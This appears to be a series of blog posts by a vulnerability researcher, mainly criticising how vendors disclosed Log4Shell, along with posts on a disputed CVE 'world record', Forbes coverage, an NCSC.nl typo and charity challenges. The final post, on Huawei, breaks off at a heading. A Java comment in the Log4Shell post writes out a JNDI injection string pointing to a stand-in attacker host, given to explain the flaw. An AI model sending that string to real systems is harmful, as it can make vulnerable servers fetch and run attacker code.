Log4Shell: Redefining Painful Disclosure

Log4Shell is yet another example of why we simply don’t get security right, and it strongly suggests there is little hope for change. There are plenty of blogs and articles that do a great job analyzing the vulnerability from the exploitation and impact angle. There are far fewer that examine why the bug exists in the first place, and why it took so long to notice. I’ll briefly touch on that and then look at Log4Shell from a bigger picture in the context of vendor responses and how they show all the chinks in the armor, enough to demonstrate that we don’t really have a set of armor at all.

If you are familiar with Log4Shell, you may want to skip the next two paragraphs, but part of the abridged summary spells out some CVE assignment confusion and explains how this blog will refer to the various issues.

What is Log4Shell? (Abridged)

On November 30, 2021, a vulnerability was made public in the Apache Log4j library that affected version 2.x but not 1.x. This is largely because, despite the same name, Log4j 2.x represents a complete rewrite of the Log4j 1.x codebase. For ease, I will refer to the library as Log4j in this blog but specifically mean the 2.x version.

The gist of the vulnerability is that when the Log4j library receives user-supplied input, it not only logs the information but can also perform lookup actions on it. This can result in the execution of arbitrary code. Since logging is frequently implemented in a way that receives user-supplied input, this can represent a significant issue and allow for trivial compromise of the system. In large enterprises, these logs can be automatically forwarded and consolidated on logging hosts that make administrative work easier, so that simple remote code execution might impact a different system than the one that first received the input.
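
To make the mechanics concrete, here is a minimal sketch in Java. The class and method names are hypothetical, and this is an illustration rather than a definitive reproduction; the behavior described in the comments applies to the vulnerable Log4j 2.x releases (2.0-beta9 through 2.14.1):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

    // Hypothetical handler: userAgent comes straight from the HTTP request.
    public void handleFailedLogin(String username, String userAgent) {
        // On vulnerable Log4j 2.x (2.0-beta9 through 2.14.1), a value such as
        //   ${jndi:ldap://attacker.example/a}
        // is not logged literally; the lookup in the formatted message is
        // resolved, causing Log4j to fetch, and potentially execute,
        // attacker-supplied code from the remote server.
        LOG.info("Failed login for {} using agent {}", username, userAgent);
    }
}
```

Nothing in that code looks unusual, which is exactly why the bug sat unnoticed for so long: the dangerous behavior lives in the library’s message formatting, not in the calling application.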

The vulnerability was originally assigned CVE-2021-44228, but the initial fix was found to be incomplete. This led to a second CVE assignment, CVE-2021-45046, which immediately started being confused with a separate issue affecting Log4j 1.x only, and only if the attacker had privileged access to begin with (CVE-2021-4104). Red Hat assigned CVE-2021-4125 to represent the original vulnerability as applied to their specific products, which is a violation of CVE Numbering Authority (CNA) rules. To add more confusion, the second attempt to fix the original vulnerability led to the discovery of a distinct denial-of-service vulnerability, assigned CVE-2021-45105. Finally, yet another flaw was discovered that also required privileged local access, despite being called “remote” by many, and it was assigned CVE-2021-44832.

This blog will generally talk about the original vulnerability (2021-44228) unless stated otherwise, and it will be referred to by its nickname “Log4Shell”. Note that while the vulnerability was technically made public on November 30 and the vendor patched it on December 6, it was not widely covered until December 10th.

Log4j History (Abridged)

First, let’s look at a slightly different history of high-risk log4j vulnerabilities, including this one. This will become important in subsequent sections. Note that the severity scores represented are CVSSv2. 

There are three more Log4j vulnerabilities, all without a CVE ID, but all scored below 6.9 CVSSv2. On top of CVSS scores, it is also important to note that the current Log4j vulnerability (2021-44228) has been scored CVSSv2 10.0 / CVSSv3 10.0 by NVD. This, along with many other scores, is not correct, as they fall into several traps that all stem from not following the CVSS specifications. As VulnDB notes, based on RBS Chief Research Officer Carsten Eiram’s analysis:

The CVSS score for this entry has been updated to reflect adherence to the CVSS scoring guidelines. On the surface this appears to be a CVSSv2 10.0 / CVSSv3 10.0 issue, as reflected in NVD and briefly by RBS. In some scenarios this is an accurate score, in others it is not. However, scoring must be done based on Log4j and the context it runs in, not speculation on possible use-case scenarios. The base score reflects that, and CVSS environmental scores allow an organization to re-cast the score based on their specific environment. So if e.g. a web server is passing user-controlled content to the logs which are then forwarded to a logging host, that represents a scope change and would get scored MS:C. Since Log4j is a library, it would have to be configured / implemented in such a way as to allow user-controlled strings which warrants Access Complexity Medium (AC:M) for CVSSv2, leading to a 9.3 score. In this case, AC:M is used for just that and does not represent user interaction required, which is often what AC:M designates. As always for libraries, they can only be scored for that *one* product, the library itself. All the products bundling the library will be affected in a myriad of ways that result in different scores, and organizations will have to tweak those scores depending on their individual configurations. A re-based score may be derived for different business units or applications even, depending on the organization’s security workflow.

Carsten Eiram, Chief Research Officer, Risk Based Security

This same scoring issue can be seen with NVD and CVE-2019-17571 (v2 7.5 / v3 9.8) as well as NVD’s score for CVE-2017-5645 (v2 7.5 / v3 9.8). The discrepancy between the v2 and v3 scores immediately stands out, since their v2 score assumes the library runs with lower privileges (C:P/I:P/A:P) while their v3 score reflects that it may run with higher privileges (C:C/I:C/A:C). NVD’s 10 / 10 scoring of the Log4j issues does not follow the specifications, and the v3 score is scored (scope changed) with specific scenarios in mind that are not default.
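
To make the AC:M versus AC:L distinction concrete, here is the arithmetic under the published CVSSv2 base equations, using the standard metric weights (AV:N = 1.0, AC:M = 0.61, AC:L = 0.71, Au:N = 0.704, C/I/A Complete = 0.66 each):

```latex
\mathrm{Impact} = 10.41\,\bigl(1-(1-0.66)^3\bigr) \approx 10.0

\mathrm{Exploitability}_{AC:M} = 20 \times 1.0 \times 0.61 \times 0.704 \approx 8.59

\mathrm{BaseScore}_{AC:M} = \bigl(0.6 \times 10.0 + 0.4 \times 8.59 - 1.5\bigr) \times 1.176 \approx 9.3

\mathrm{Exploitability}_{AC:L} = 20 \times 1.0 \times 0.71 \times 0.704 \approx 10.0
\quad\Rightarrow\quad
\mathrm{BaseScore}_{AC:L} \approx 10.0
```

In other words, the entire 10.0 versus 9.3 debate reduces to a single metric: whether the library, on its own, requires a particular configuration (AC:M) before user-controlled strings ever reach it.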

Regardless of these scores, 2021-44228, 2019-17571, and 2017-5645 should all be treated as equally serious until an organization determines how each impacts them. In reality? That isn’t the case, and it doesn’t make sense, other than the fact that news, researchers, and vendors all cried out that this one is “critical” while the previous vulnerabilities were largely ignored. This is very similar to the Struts-Shock vulnerability, which made the news primarily because it was used to breach Equifax, while other Apache Struts vulnerabilities didn’t enjoy any attention. Perhaps if the other 21 remote code execution vulnerabilities in Struts had names they too would be better known?

Vendor Disclosure Disappointment

This Log4j vulnerability stands apart from prior issues in the library, even ones with the same severity. We see vendors publish advisories calling it a “global event” and “industry-wide“, using language that seems to convey that being vulnerable “couldn’t be helped, it affects everyone!” Sure? While that may be true, it raises the question of why they published an advisory for Log4Shell but not for prior vulnerabilities. In other cases, a vendor may definitively (and ironically) say that it “affects all service providers using the Log4J Java library”, which is untrue, while also saying it “affects certain applications and services” of theirs. This is in addition to a staggering number of vendors publishing advisories saying they are not impacted by the vulnerability, something we have never seen at this volume. Of course, I have to mention the vendors that are “quickly working to assess any potential impact to our clients and the company” … three weeks later.

[1/8/2022 Next two paragraphs updated, thanks to L.P. for the pointer on origin of “LogJam” confusion.]

Despite not being the researchers to discover this vulnerability, LunaSec was one of the first to write an easy-to-digest blog explaining the issue. This is valuable to many administrators that need to quickly understand the risk. However, LunaSec decided to name the vulnerability despite not finding it. They chose “logjam” for the name, oblivious to the fact that Logjam was the name given to the “Diffie–Hellman Key Exchange DHE_EXPORT Cipher Handling Downgrade MitM Weakness” vulnerability back in 2015. That vulnerability didn’t fly under the radar by any means; consider that VulnDB has over 1,000 references for it, meaning many hundreds of vendors wrote advisories and patched it in their software. LunaSec apparently had no knowledge of this vulnerability and didn’t do a simple search for the name before using it. This is amateur hour, extremely counter-productive, and introduces serious confusion around the vulnerability.

Vendors that don’t publish advisories frequently are also more prone to simple mistakes that introduce confusion. Take Pandora FMS or Kiteworks for example, who conflated Log4Shell with Logjam, no doubt because they saw LunaSec call it that. The two issues are extremely different. One is in Apache’s Log4J library and the other is in the Diffie–Hellman Key Exchange, requiring a privileged network position to intercept traffic. But this mistake isn’t just the domain of those new to security advisories; Micro Focus, which has decades of experience sharing vulnerability information, typically in changelogs instead of formal advisories, made the same mistake. You might chalk this up to a simple error, but remember that Micro Focus wrote at least five advisories referencing LogJam. [1] [2] [3] [4] [5]

For those using CVE IDs to track this vulnerability, it can get confusing. Log4Shell has three associated CVE IDs: the original (2021-44228), the incomplete fix (2021-45046), and a duplicate assignment from a CNA (2021-4125). Then we have waves of incorrect CVE IDs being used, typically transposed-digit typos. This may cause someone to think there is yet another Log4J vulnerability, or cause them to miss an advisory as they search for the correct CVEs. We can see examples from researchers (2021-4438), bloggers and universities (2021-44248), companies (2021-44248), security news (2021-44882), vendors (2021-45056), security companies (2021-44226), and likely more variations. There are more incorrect CVE IDs attributed to this vulnerability than correct ones.
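
One partial defense against publishing such typos is to sanity-check every CVE ID in a document against the official CVE list before it goes out. Below is a minimal sketch in Java; the known-cves.txt file is a hypothetical local export of assigned IDs (e.g. built from the official CVE list downloads), and note the caveat in the comments: a transposed ID may still collide with a different valid CVE, so a check like this catches only some of the typos.

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Set;
import java.util.regex.Pattern;

public class CveSanityCheck {
    // CVE IDs are "CVE-YYYY-NNNN..." with four or more digits in the sequence.
    private static final Pattern CVE_FORMAT = Pattern.compile("CVE-\\d{4}-\\d{4,}");

    public static void main(String[] args) throws Exception {
        // Hypothetical local export of all assigned CVE IDs, one per line.
        Set<String> known = Set.copyOf(Files.readAllLines(Path.of("known-cves.txt")));

        for (String id : args) {
            if (!CVE_FORMAT.matcher(id).matches()) {
                System.out.println(id + ": malformed CVE ID");
            } else if (!known.contains(id)) {
                // Well-formed but unassigned IDs are often transposition typos.
                // A transposed ID that happens to be assigned to a *different*
                // vulnerability will pass this check, so human review still matters.
                System.out.println(id + ": not in the known CVE list, possible typo");
            }
        }
    }
}
```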

In many cases, it is the first time we see an advisory from hundreds of companies, despite them “caring deeply” and “taking your security seriously“. Yes, they responded quickly to this vulnerability, but why not the rest? Why aren’t there advisories on any of the vulnerabilities specific to your code? Why no advisories about other third-party library vulnerabilities? It only proves they didn’t care about all the prior vulnerabilities, which simply didn’t receive the same level of public attention. They don’t care enough to let you know of the risk of dozens or hundreds of other vulnerabilities, but somehow they “deeply care“.

Dozens of vendors are publishing advisories that are only available to paying customers. When a vendor publishes behind a paywall it makes it difficult for many teams to access that information. While Alice and Bob from the security team may have access, Christine, Dave, Eve, and Frank may not. In other cases the IT/networking team may have access to the account in order to download new firmware, but the security team does not. Those restricted advisories also stay out of reach of third parties that aggregate that information, many of which are retained to provide vulnerability intelligence to the mutual customer. These companies don’t want to check hundreds of vendors for security updates every day; they want someone else to. 

This also applies to vendors that say they will contact customers directly who require updates, or that publish an anemic advisory saying you need to contact customer service or “contact our support department for product-specific questions“. In many cases those notifications are not going to the appropriate people. Some accounts are set up by different divisions or by managers who handle vendor relationships. In other cases there is employee turnover, so vendors end up contacting people who have left the company.

There are vendors that may understand the issue and respond accordingly, but then fail to communicate it well to customers. For example, L-Soft’s advisory says that one version of their software uses Log4j 2.15.0 “and is therefore not vulnerable to CVE-2021-44228 (Log4Shell) but may still be vulnerable to CVE-2021-45046 and CVE-2021-45105“. This is incorrect, as 2.15.0 is vulnerable to Log4Shell in many instances. If it doesn’t affect them due to configuration, then the advisory should specifically say that.

How and where vendors choose to disclose can also prove problematic. Modern large organizations may literally use products and services from thousands of vendors, so it is easy to understand why they don’t want to monitor them all for security updates. In addition to vendor security advisories, knowledge bases, wikis, support forums, and email distributions, some vendors opt to disclose elsewhere. In the case of Log4Shell, we’re seeing that happen on Twitter and Reddit.

In other cases we are seeing “advisories” being shared on GitHub in an image (PNG), which doesn’t let you cut & paste the text. When the article isn’t in your native language, it’s basically worthless since you can’t trivially translate it. It reminds me of vendors that publish changelogs or advisories in PDF format, but have disabled the copy & paste functionality in it. 

The researcher SwitHack has done an incredible job collecting vendor advisories related to Log4Shell, but in doing so, has created a similar situation where disclosures happen in comments to their Gist. This collection of references also highlights the problem of “linkrot”; when a link goes 404 and the content is moved or removed completely. It’s been less than one month and half a dozen references are already 404. Some vendors publish their advisory in a place that almost guarantees it will move or vanish in time.

For those who rely on the version of software to track vulnerabilities, this is typically the best approach. In some cases, vendors work against your efforts when they say “The following product IS affected: AppDev Pack versions 1.0.5 – 1.0.11” and then “As of this writing the latest release of AppDev Pack, version 1.0.11, updates the referenced version of log4j2 to 2.15.0.” In this case, not only do you have to download the same version of the software as of a given date, you are still not protected weeks later because it only updates Log4J to 2.15.0 instead of 2.17.0, which resolves all of the known issues.
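
For readers trying to verify what a product actually bundles, one hedged approach is to ask the running JVM which log4j-core it loaded, rather than trusting the advisory. A minimal sketch, assuming the jar’s manifest carries an Implementation-Version (it may not in shaded or repackaged builds):

```java
public class Log4jVersionCheck {
    public static void main(String[] args) {
        // Reads the Implementation-Version from the log4j-core jar manifest.
        // Depending on packaging (e.g. shaded or repackaged jars) this may be
        // null, in which case the version has to be verified by hand.
        Package core = org.apache.logging.log4j.core.Logger.class.getPackage();
        String version = (core == null) ? null : core.getImplementationVersion();
        System.out.println("log4j-core version: " + version);
        // Anything in the 2.x line below 2.17.0 still carries at least one known issue.
    }
}
```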

There is another type of vendor that likes conveying information in tables. For some data that is great, but for vulnerability information it can often be more difficult to process. Solace decided to share their matrices in image format, basically unreadable as is. You have to copy the image URL and load it in a new tab to read it, since they aren’t even clickable links. HCL Technologies gives us one table to decipher, a word I use with reason. This handy table will let you figure out if you are impacted:

Clarity in vulnerability disclosure can be tricky in a case like Log4Shell, given that it has three CVE IDs and additional vulnerabilities were discovered within days of the original disclosure. However, when a vendor references three CVE IDs for Log4J vulnerabilities and then decides to also include a 2018 vulnerability in Log4Net, which is not affected by the Log4Shell issue, it introduces confusion. Specific to Log4J, some of the initial confusion came in the form of version 1.x versus 2.x. While they share the same name, version 2.x was a complete rewrite of 1.x and doesn’t share much beyond the name. Given that several vulnerabilities do not affect 1.x while one vulnerability affects 1.x and not 2.x, it’s messy. So a vendor responding to the Log4Shell vulnerability (in 2.x) proudly saying something like “We’re not vulnerable, we use 1.x!” and then not mentioning whether they are impacted by CVE-2021-4104 (in 1.x) is frustrating.

If all of this seems discouraging and you better appreciate some of the frustrations around vulnerability intelligence, consider this: not even the vendor, Apache, gets it right. Three weeks after Log4Shell was disclosed, the Apache blog aggregating information about their own products is missing information (Daffodil, HBase, ManifoldCF, etc.) and incorrect about some (Geode, Jena, etc.). If the vendor can’t aggregate accurate and timely information on their own product portfolio, what hope do the rest of us have?

Keeping Up

As you can see from the ‘Disclosure Disappointments’ above, trying to stay current with the Log4Shell vulnerability is a nightmare. VulnDB is currently cataloging over 1,100 vendor advisories in addition to vendor-specific solution references, exploits, and a wide variety of additional references. In less than 30 days, VulnDB 275958 (Log4Shell) has more references than Spectre, Meltdown, SWEET32, SLOTH, FREAK, Shellshock, Heartbleed, and Logjam. The only vulnerability with more references right now is POODLE, but that is likely to change in the coming weeks as more vendors finally publish their advisories.

Every day the VulnDB team continues to scour vendor web sites, Twitter, GitHub, and other sources looking for more information. When a new advisory is found we have to determine if any information needs to be cataloged and update the entry accordingly. Consider each added reference, each vendor/product/version combination, and each updated field as a single data point, and imagine what that looks like. As of this blog, that is 9,749 points of data, which is staggering for one vulnerability, especially one published less than a month ago. Here’s what that looks like:

You can see when the news sank in and vendors really started responding to it. For the next half year or more, that entry will keep getting updated. For those who think that managing a vulnerability database is “just collecting public information“, you are right. But summiting Mount Everest is also just “walking up that hill“.

What can you do? The customers have the power here. If your vendor releases a poorly worded advisory, or this is their very first advisory, take them to task. You must hold them accountable and be ready to switch vendors, which is painful I know, so that your money can teach them a lesson. Demand not only better security practices from your vendors, but better communication about vulnerabilities that impact you. Unfortunately, that threat of switching vendors is typically an empty one, and vendors know it.

Based on everything above, enumerating many of the failures around disclosing a single vulnerability, it’s hard to imagine our industry has much hope. How can organizations really expect to maintain security in the face of vendors that say they care, but act otherwise? Vendors and the information security sector are expected to provide a level of defense that will repel attackers. Unfortunately, we’re our own worst enemy and the staggering number of data breaches are evidence of that. But hey, at least we put on a good show.

Privasec’s Ridiculous Claim of a “World Record” in Vulnerability Disclosure

On May 9, 2019, Privasec published an odd press release with a URL slug of “privasec-queensland-telstra-acquisition” but a title of “Privasec Red’s Consultant Breaks World Record By Disclosing Most Number Of Open-Source CVEs.” This claim is simply wrong. To believe it requires either a complete lack of understanding of the vulnerability disclosure landscape or intent to deceive. Neither is a good look for a security company.

The Claim

The claim that Sajeeb Asim Lohani (a.k.a. sml555 a.k.a. ProDigySML) has disclosed 120 vulnerabilities, and that this is a record, is fairly trivial to debunk. I say fairly trivial because it requires a good vulnerability dataset that tracks creditee information. Since CVE / NVD do not do that, I am curious how Privasec came to their conclusion. SecurityFocus’ BID and IBM X-Force are public databases that track creditees, but neither allows for a way to readily poll for that statistic. Even scraping that data, mangling it, and making a local searchable dataset should quickly show that 120 is probably not the record. [Update: IBM XFD shows 60 total]. So Privasec’s first mistake is not explaining how they arrived at their claim.

The Debunking

Using VulnDB, which also tracks creditees and makes them easy to search along with statistics about the researcher, I don’t even see 120 vulnerabilities credited to Lohani. This is after combining three separate creditees (Lohani, sml555, and ProDigySML), all the same person, into a single creditee. That yielded 78 vulnerabilities:

Why 78 versus the claimed 120, record or not? There are several possibilities here, and they are not mutually exclusive. The easiest explanation is that there are over 40 disclosures by Lohani that have not been aggregated by VulnDB. Given the historical data and thousands of sources monitored, that would be a bit suspect. The fact that he “was nominated for AISA Rookie of the Year in 2017“ suggests this isn’t an issue of disclosures being historical and the data being incomplete.

Another possibility is that Privasec is trying to hide behind a single word in this press release. Note that it says he “has broken the world record by privately disclosing 120 Open-Source CVEs.” The problem with using this as an out: how do they know how many other vulnerabilities were privately disclosed? Besides, they also make a point to say “Open-Source CVEs”, which presumably means “public” CVEs. This is on top of the PR headline not qualifying their claim at all.

One last possibility is that there are over 40 more of his vulnerabilities with a CVE, but all in RESERVED status. If that were the case, you’d expect them to have contacted MITRE to get them published; after all, they do say “open-source”. Additionally, they likely don’t have knowledge of the RESERVED entries that are actually public, which number in the thousands.

The Counter

If not Lohani, who has the most vulnerabilities to their name? Probably Mateusz Jurczyk (j00ru), but I would have to do some more data massaging to verify it. He (1,717) and Gynvael Coldwind (1,143) both come to mind for an incredible number of vulnerabilities, many disclosed together. Another name from a ways back is r0t (811), who rode the web application wave with many XSS and file inclusion vulnerabilities. Compare any of those to Lohani with his claimed “world record” of 120 and you can see it is quite absurd. Hell, Jurczyk has more Microsoft Windows vulnerabilities with a CVE assignment than Lohani has vulnerabilities in total. It’s clear Privasec didn’t do their homework, or simply didn’t care to.

The Offer

Am I wrong? Possibly. I outlined several reasons why the numbers might be off on either side. So I have an offer for Lohani and Privasec: prove me wrong. It’s quite simple too, since you have the data used for the 120 figure. Share a list of Lohani’s vulnerabilities with me. A simple list of the CVE IDs is all I need; I will do the heavy lifting to verify that the number is accurate. You’re still wrong about that “world record” either way, as proven above. But I would love to see the list of 120 you claim regardless.

The Charity Challenge for Banshee

Unfortunately for them, the fax machine was invented in 1843. Banshee admitted defeat, so Durian it is! But I wanted to give some encouragement and started a charity pledge drive. Of course, me being me, I created a tracking sheet for this, and as of this blog there is already $1,945 in pledges to help support Love and Justice in the Streets.

Since Durian isn’t in season, Banshee is going to consume it at the next DEF CON in front of witnesses to make it official. Until then, I’d love to see more pledges! Send me a tweet and tag @banasidhe in it!


Forbes: Lazy Vulnerability Reporting & A Bit of Bias

Almost two decades ago, I joked with colleagues that many Information Security news articles could just be done via Mad Libs. We later joked that breach notifications often appeared to be done via Mad Libs, using the same phrases with different organization names and numbers of affected customers. Over the last few years, it seems Forbes has gotten lazy in their reporting on computer vulnerabilities.

First, a bit of background by querying Risk Based Security’s VulnDB, which I work on. While we track news articles on vulnerabilities, it is important to note that this is done on a best-effort basis. We try to capture higher-profile articles in the bigger publications within InfoSec and those outside the proverbial “echo chamber”, which includes Forbes, New York Times, Washington Post, Fox, etc. So by no means is this comprehensive, but it is important to understand the methodology, which uses Google Alerts based on “CVE” strings. This started several years ago, maybe around 2015 give or take. Articles from before that were included as they came across social media, were referenced in modern disclosures, or surfaced in some other manner, regardless of publication date.

The first Forbes article we have associated with a vulnerability goes back to June 17, 2001, covering a vulnerability in a GE Healthcare device. Up to 2010, almost every Forbes article we have covers a GE device, along with one about Oracle and one about the Linux kernel. That alone is kind of interesting. From 2010 to 2020 we have Forbes articles covering a wide variety of vendors including Google, Onity, GE, Apple, Magento, PLX, and more. They also included articles covering big disclosures that spanned multiple vendors of DVR systems, SIM cards, microprocessors, and more. Last year, in 2020, Forbes produced a steady stream of articles on all the big vendors including Cisco, Microsoft, Apple, Google, Intel, Citrix, Zoom, and more.

This year though, it seems like Forbes got lazy. Perhaps it is burnout from writing what is essentially the same article? You might think that, but no, because writing the same article is exactly what they started doing. Coverage is heavily based around Google Chrome and components in it, but disclosed via Google Chrome’s blog. Of the 48 vulnerabilities cataloged by VulnDB in 2021 that have an associated Forbes article, only 12 are in non-Chrome products. What’s the gist of their coverage? Here are three examples; see if you notice the similarities.

You may see the common phrase, “2 Billion Chrome Users”. Don’t worry, in a recent article that got increased to 2.6 billion! If it isn’t in the headline, you can find the phrase in almost every article talking about Chrome vulnerabilities. I get that these articles are repetitive, because there are only so many ways you can say Google fixed vulnerabilities in their browser.

That said, what’s more interesting to me is that they appear to have published a single similar article for Mozilla Firefox vulnerabilities in all that time, while continuing to encourage users to ditch Chrome. If I didn’t know better, I might think Forbes has chosen a side in the browser wars.

An 83 Word Excuse Instead of a 1 Character Fix (NCSC.nl)

The National Cyber Security Center of the Netherlands (NCSC.nl) has a curious take on sharing security information. On October 25, 2021, I contacted them to inform them of a simple typo in one of their advisories. I send emails or Tweets like this several times a week to researchers, vendors, and news outlets, as CVE typos are prevalent. The issue is that a mistyped CVE ID can cause a lot of headache for organizations that take vulnerability intelligence seriously. Imagine an alert about a new CVE affecting enterprise software running your most critical assets, where all you can find is a news article saying the issue is critical. The vendor advisory doesn’t reference it, and there is almost nothing to be found on Google or social media. What do you do? Before you spin up the entire team and tell them to stay late planning for emergency remediation, you need to know what you are dealing with.

Most of the time, the Tweets and emails get a quick reply acknowledging it was a typo and they fix it when possible. Every so often I get no reply and the typo stays there, likely forever. That typically happens on sites that appear to be automated aggregation of content for the sole purpose of getting clicks to generate ad revenue. They have no contact information, no social media, and no author bylines. Otherwise, generally such notifications are well received.

In the case of NCSC.nl, I figured I would get a prompt reply and a quick fix. I got the prompt reply, but not the fix. First, note that they provide limited advisory services notifying their stakeholders of vulnerabilities, and a page describing what the advisories are. They also have a PDF with a longer explanation of what a security advisory is. Per Google Translate, the advisories’ “… aim is to describe what the vulnerability is and what could possibly happen if it is exploited.” Simple and straightforward. As most security professionals know, accuracy in an advisory is important. A typo in a CVE could point to the wrong vulnerability, which might be in the wrong software completely, or the right software and the wrong vulnerability. I contacted their info@ address to let them know about the typo:

https://advisories.ncsc.nl/advisory?id=NCSC-2021-0840

[..] CVE-2021-3715 , CVE-2021-38160 , CVE-2021-4049 [Link]

That should be CVE-2021-40490 at the end.

Brian

The prompt reply I received the next morning was rather baffling. They ‘investigated’ the issue, confirmed I was correct, and wrote a 62-word reply over six lines instead of just fixing the single character that was missing.

Thank you for your e-mail. Hereby we confirm that we have received your
email and investigated the issue. We would like to thank you for your
friendly remark. However, we have decided not to update the
advisory as the CVE number is written correctly in other places in the
advisory.
Feel free to contact us again if there are any questions left.

I naturally questioned them on this odd reply and refusal to fix an inaccurate CVE identifier:

Yes, I have questions.

Why wouldn’t you correct a simple typo? More specifically, for a CVE ID that can cause confusion for security practitioners trying to ensure they have accurate vulnerability intelligence. Anyone reading your advisory may go down a proverbial rabbit hole trying to figure out what CVE-2021-4049 represents and waste considerable time.

Consider that that typo caused our team to respond trying to figure out what that ID represents. Fortunately, we have amazing vulnerability intelligence and it was fairly easy to deduce what happened.

Your apathy in this matter is staggering.

I hoped that an explanation, with a bit of shaming, might prompt them to just fix the single missing character. Nope…

Thank you for your e-mail. We appreciate your concerns. When the advisory
needs to be updated the typo will be corrected.

OK, but the advisory literally needs to be updated to fix the typo. This recursive excuse is just absurd. A 21-word reply this time instead of a one-character fix. They appreciate my concerns, but not enough to fix ONE CHARACTER.

It’s hard to have faith in Information Security when a national security center doesn’t understand the importance of accuracy and integrity. I hope organizations in the Netherlands are not relying on the NCSC.

The Charity Challenge for The Only Mike E.

Well, maybe not the only one, but this one promises to be fun! It started with such a harmless Tweet, essentially Mike digging his own mouth-hole grave. From there it really spiraled out of control and it just keeps getting better.

This evening I put my Amazon skills where his mouth is and sent items, along with the offers to donate to charity on his behalf. Here’s how it works:

  • I send him a food(ish) item.
  • He has to consume it in some fashion. Restrictions or requirements may apply.
  • He posts a picture or video of consumption.
  • We believe he won’t hoodwink us.
  • I donate to the charity of his choice!

If he completes all of the challenges below, to their fullest potential, he will raise $1,700 for charity. That said, we are both hoping that others will offer to donate a few bucks to see these challenges go down. Even better, if anyone will offer to match even one of the challenges, we could all do a lot of good here. At Mike’s expense, so really doing two types of good. If you’d like to pledge, send a tweet to @attritionorg with which challenge(s) you would like to sponsor and the charity pledge amount. Those who pledge will be added at the end of this blog!

Challenge #1: Blair’s Ultra Death Sauce! This is rated between 800,000 and 1,100,000 SHU depending on the site you read. Either way, this will bring some spice into his life. It may also cause him not to do #UnicornChef for a week as his taste buds regrow. This sauce is reportedly the hottest sauce that they have made, hotter than their “Mega Death” sauce. What’s in it? Red Habanero Pods, Cayenne Chiles, White Vinegar, Natural Pepper Flavor (contains Soybean Oil), Tomato Puree, Pirri-Pirri Chiles, Pumpkin Seed, Lime Juice, Salt, and Spices. Look at that… tomatoes, lime juice, pumpkin seed, salt, and spices. All ingredients he has probably cooked with, so this one is an easy one. The bounty: $100 for eating a cracker or similar with a healthy dash of the sauce or $200 for shaking several dashes of sauce directly into his mouth-hole. An extra $50 for using it to prank his wife on video.

Challenge #2: Mrs. Butterworth’s Sugar Free Syrup! Note that I was generous and got him the sugar-free version of this. As a type-1 diabetic, I only want him to hate his mouth, not his pancreas. Anyway, this challenge is simple! Anyone familiar with the movie Super Troopers knows how this goes. Here’s a video clip reminder. Just tilt the head back, open the mouth-hole, and chug it down like a syrup pro. The bounty: $100 for chugging a quarter of the bottle. $200 for chugging half the bottle. $500 for chugging the entire thing in the same approximate time as we see in the movie.

Challenge #3: Fatworks, Pasture Raised Leaf Lard, a.k.a. “Baker’s Lard”, Artisanally Rendered, for Traditional & Gourmet Baking, Sautéing, and Frying. Bonus… this is keto and paleo friendly! This was Apacid’s idea along with the syrup. He’s quite sick in the head. I think one large spoonful stuffed into his mouth-hole to “chew” on is a sufficient challenge, then he can use the rest for cooking. No extra flavoring, no additives, just a nice chunk of pure lard. The bounty: $100 for a large spoonful. Bonus, he can redeem this bounty up to three times if done on the same day!

Challenge #4: Not believing these were good enough, Mike then made the mistake of proposing his own challenge, to which I quickly agreed. “I’ll eat a bowl of dog kibble in maple syrup for your animal shelters out there.” If he completes all of the second challenge he’ll have to use his own maple syrup for this one. He gets to pick his favorite dog kibble and syrup, and eat at his leisure. Of course, if he drowns it in enough syrup he won’t taste the kibble, but that is up to him. The bounty: $250 for the entire bowl, to the animal charity of his choice. He has chosen the New Hampshire SPCA for this one.


Pledgers:

  • John Rex – $100 for each of the first four challenges. [ref]

Assessing the ‘War on Tech’: Huawei vs. U.S.

[I wrote this with Curtis Kang who did a lot of work researching various aspects of this article and provided invaluable help. His research and written contributions made this article possible. It was originally intended to be published on RiskBasedSecurity.com in early 2020 but was passed over so I am publishing it here.]


In 2019, we saw the steadily-growing social and policy conflicts between the United States and China reach a boiling point. China has been a major talking-point of President Trump’s platform since early in his campaign. However, it wasn’t until last year that we saw active policies enforcing a so-called “war on tech” between the U.S. and major Chinese companies like Huawei and ZTE, and those policies being “sidestepped”. We wanted to examine this from a data perspective, looking at the vulnerabilities in similar companies from both sides.

To set the stage, it is useful to briefly revisit the U.S. vs CN timeline.

The Trade War

Since taking office in January 2017, President Trump has had a specific interest in China, stating early on that the “U.S. will be on a level playing field”. This led to several rounds of tariffs being imposed against China starting in March 2018, and retaliatory tariffs being imposed against the U.S. Early in 2019, there was conjecture that President Trump might use an executive order to prevent some U.S. companies, such as wireless carriers, from purchasing Chinese electronic devices. That executive order was signed on May 15, 2019, citing the National Emergencies Act (50 U.S.C. 1601 et seq.), and would limit or ban purchases of “technology or services designed, developed, manufactured, or supplied, by persons owned by, controlled by, or subject to the jurisdiction or direction of a foreign adversary”.

While the executive order did not list any country or company, it was widely accepted that it was a move against Huawei in particular. The order contained interesting language, saying that the banned technology or services “poses an undue risk of sabotage” and is “an unacceptable risk” to the United States, among other wording. Technology meeting those criteria would be determined by the Secretary of Commerce, in consultation with nine other bodies “and as appropriate, the heads of other executive departments and agencies”.

On May 20, 2019, the BIS modified the final rule and granted a Temporary General License (TGL) until August 19, 2019 for transactions regarding, among other things, “Continued Operation of Existing Networks and Equipment” and “Cybersecurity Research and Vulnerability Disclosure.” On August 19, 2019, the BIS extended the TGL by 90 days, or until November 19, 2019. Outside the TGL, any request for a license to sell or transfer commodities, software or technology to Huawei is reviewed “under a policy of presumption of denial.” In other words, the BIS provides virtually no avenue for a continued commercial relationship with Huawei after November 19, 2019.

Months later, when asked if China would retaliate, Chinese foreign ministry spokesman Geng Shuang told reporters “stay tuned.” Two weeks after that, China announced tariffs on $75 billion of U.S. products. This was followed in December with China announcing a ban on foreign technology in “all government offices and public institutions” within three years. The ban also prevented companies such as Google, Dropbox, and Facebook from being used within China. With this, the United States and China were in a new type of technology war based on the premise that the adversarial nation was producing equipment that “poses an undue risk of catastrophic effects”.

The Fear of Backdoors

